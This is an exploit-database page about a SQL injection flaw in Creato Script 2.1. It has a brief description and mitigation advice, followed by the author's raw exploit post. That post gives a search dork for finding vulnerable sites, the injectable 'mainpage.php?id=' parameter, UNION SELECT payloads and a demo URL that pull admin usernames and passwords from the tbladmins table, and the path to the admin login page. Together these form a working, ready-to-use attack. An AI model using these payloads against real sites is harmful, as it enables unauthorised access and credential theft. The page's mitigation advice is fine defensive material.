Creato Script SQL Injection Vulnerability

vendor:

Creato Script

by:

Mr.P3rfekT

7,5

CVSS

HIGH

SQL Injection

CWE

Product Name: Creato Script

Affected Version From: 2.1

Affected Version To: 2.1

Patch Exists: N/A

Related CWE: N/A

CPE: a:creato:creato_script

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Linux

N/A

Creato Script SQL Injection Vulnerability

A SQL injection vulnerability was discovered in the Creato Script software. An attacker can exploit this vulnerability by sending a malicious SQL query to the vulnerable parameter 'id' in the 'mainpage.php' file. This can allow the attacker to gain access to the admin username and password.

Mitigation:

Input validation should be used to prevent SQL injection attacks. Additionally, the application should be configured to use parameterized queries.

Source

Exploit-DB raw data:

# Title:  Creato Script SQL Injection Vulnerability
# Version: 2.1
# Author: Mr.P3rfekT
# Software Site:  http://www.creato.biz 
# Tested on Lunix
# CVE : N/A
   
############### Founded By Mr.P3rfekT ###############
# Dork : " created by creato.biz "


# Helllo Allz.
   
   
# Exploit :
   
http://[site]/mainpage.php?id={SQLi}



# Poc Username:

union select 1,adminusername,3,4,5,6,7,8,9,10,11,12 from tbladmins--


# Poc Password:

# union select 1,adminpassword,3,4,5,6,7,8,9,10,11,12 from tbladmins--


# Demo:

 http://[site]/mainpage.php?id=-6 union select 1,adminpassword,3,4,5,6,7,8,9,10,11,12 from tbladmins--
 
# Admin Login


# http://[site]/admun/login.php

# ./done.
  
   
####################################################################
   
MaiL :R4p@hotmail.com
  
Greeetz To : Sinaritx,HcJ,Mr.Black,D3ViL H4CK3R,Uzm4n,Nani17,Cyb3r-DeViL,www.v4-team.com,www.arab-exploit.com Cr3w,www.Barcelonasy.com & All Who Known Me
  
   
###############################################